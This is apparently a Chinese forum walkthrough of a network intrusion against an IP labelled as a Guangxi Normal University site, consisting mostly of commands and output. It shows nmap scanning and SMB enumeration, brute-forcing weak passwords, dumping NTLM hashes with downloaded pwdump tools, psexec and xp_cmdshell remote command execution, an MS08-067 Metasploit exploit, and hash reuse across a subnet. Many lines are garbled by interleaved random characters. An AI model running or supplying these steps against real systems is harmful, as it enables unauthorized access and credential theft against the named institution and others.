广西师范网站 http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
5 f( q7 h. D3 n; L3 d; Y2 x5 V- i( H1 v2 X1 t1 R/ W/ u
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser //扫描结果

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
//查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
" l' P, ]) Z/ y1 b& H/ C) @% ]root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
( Q1 x. i! @! S2 c* @6 t, I, R8 H
4 x& Q |6 o2 Q+ K1 {' L//获取用户密码
5 ]3 z8 ?2 `) C0 ]9 b# Z) L
% F% ^5 n. c+ V2 O/ e" AStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
$ U: w5 U; \7 k' t
) v$ S) ? c! s2 m0 b. V+ YNmap scan report for bogon (202.103.242.2418)
- U7 i3 c, Z8 ~+ q) |" X
6 U& I* Q5 `* o8 B+ _, \: zHost is up (0.00041s latency)., L$ j4 c1 ~: _
! V% i1 a& e( H4 M B* YNot shown: 993 closed ports
- `% E5 D& N7 z( z
+ l4 N. z3 J1 BPORT STATE SERVICE
/ K4 i" M2 l5 m6 p# p9 K$ q F: P4 F0 V
135/tcp open msrpc
' q6 W) v& N) T: _5 n; ]( Y* X( Y- a6 }/ H2 E7 s0 l1 O
139/tcp open netbios-ssn% E2 @3 j+ ?; o5 t/ l
3 p& Z; A" \7 |. N4 m
445/tcp open microsoft-ds
$ t. }% `. B0 g0 W) y! e# w1 G
% p- ~, L. i$ `5 U1025/tcp open NFS-or-IIS
/ D1 }/ w, g$ `. R; V; p$ q5 Z6 w8 ?: }% w' [
1026/tcp open LSA-or-nterm- M% ?- Y; M9 F; f; ]# o
. n* E c8 M( X$ D, D3 y( y2 L
3372/tcp open msdtc
/ ^4 {( y8 J7 o2 O1 ?- H6 V$ Y( L
3389/tcp open ms-term-serv
6 H+ } \ v- N8 m! }
o8 c- [5 c3 H# @! X! n, ?MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)8 f1 f& J) T* I0 ?8 ~0 ]6 O
) M8 F9 r9 q8 i8 e7 o& ?& i# DHost script results:7 s+ X* H. {6 r. n& I8 K3 F
& I Q1 [8 ^- q$ N/ X7 G
| smb-brute:1 P/ F- L5 L+ K1 y; _- w$ @
0 U* y+ K: {# h$ o& \; w' Ladministrator:<blank> => Login was successful: @- S7 X$ `3 V9 N9 |
6 Q6 E0 Y1 T: ~8 k8 q7 I7 W& e9 ]|_ test:123456 => Login was successful
9 C% x+ j4 L3 h* ]. ^8 M L6 I9 M% ]( U- n: S
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds5 t8 L0 l+ y* e5 c! r
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
; k( L# J' E! _1 Q* U* s4 u4 [7 P! {6 v% h3 ~5 q: Y8 Z
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
-p 123456 -e cmd.exe

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" //远程登录sa执行命令
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
, H8 X: L/ ~4 n$ a' s
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)

msf exploit(ms08_067_netapi) > sessions -l
5 R6 n3 d" i1 @. g# vroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt* s: n7 X9 ? t' G \
( A" J# n% F) j0 l! l
test5 i0 G) n( Q# t
9 N) [+ m: {+ L6 j' U1 d* j/ zadministrator6 q5 h8 h) ~* \" g8 _! j4 Y) `
! w& ?3 \; S2 ?- L% `
root@bt:/usr/local/share/nmap/scripts# vim password.txt- n+ k" c8 ]+ ~4 N8 Q. o
4 z) w, h' A d' `
44EFCE164AB921CAAAD3B435B51404EE1 E: p) Q. v" G) ? o( Y, B5 W+ G
. p7 R- M+ H& W' I) s, T3 p1 Uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
4 G( H5 M* E$ v5 m7 }+ U7 a
5 Y/ n* R; w& v //利用用户名跟获取的hash尝试对整段内网进行登录
; g/ u8 Y; n9 d* \2 }- S9 h( @6 b
# k, e! O! W/ `* uNmap scan report for 192.168.1.1053 h( j* t3 @" u( v1 P
G [0 K- u5 O1 X0 k2 b/ g! f$ N% kHost is up (0.00088s latency).4 }3 }% l3 o8 M( i( x5 g& f
2 w" D3 k8 v( N$ A1 qNot shown: 993 closed ports
1 [, @; X+ `1 N& {/ M
3 x$ e% f% g% h* e7 gPORT STATE SERVICE
: R5 Z5 r0 `: F; s9 P/ t2 {
) _) |2 j' T. |+ i, S, m; J( x! ~135/tcp open msrpc
6 ]4 V, Q0 ], C2 u, d$ Y+ B# N: e# j6 w; n
139/tcp open netbios-ssn
" }" }7 U3 _3 ~( j) L: O* l
# f7 q5 F- `0 O6 m' j- \$ C445/tcp open microsoft-ds
7 `9 Z2 i/ _' [8 d( s4 g# @3 M: |6 a2 F4 @2 P5 @
1025/tcp open NFS-or-IIS
/ Q& @3 x( K/ @! d; J5 w
* d5 K. ^* k5 Q1026/tcp open LSA-or-nterm
6 B" A0 g7 {% i; z1 i) N4 N* p1 | ?; @6 T/ r5 E2 b* J
3372/tcp open msdtc1 l- |# o' x) x) v& ]/ ]5 e/ c' r
% K; Q% H5 V% h5 {9 r3 Q- `* v x3389/tcp open ms-term-serv
( q) A e. J# t) u k+ D" y
6 ~& u8 I! ]) u2 l$ IMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)# M9 I6 @6 E, {
# }7 A9 A& H) `/ @- PHost script results:
! f) J& W$ H7 o- V: o! l
; @- t$ B) G5 Y0 G% r4 Q3 {3 d1 K| smb-brute:% Z" F+ d8 ^4 E7 X9 R8 ~8 Q
; ]7 r5 y& w p1 r|_ administrator:<blank> => Login was successful
0 r$ H; a' V" R6 Q5 J% [( w/ ?' O. A
攻击成功,一个简单的msf+nmap攻击~~·6 _5 _2 t! n4 a; z
" Q9 o: t( {: S. |# V1 Z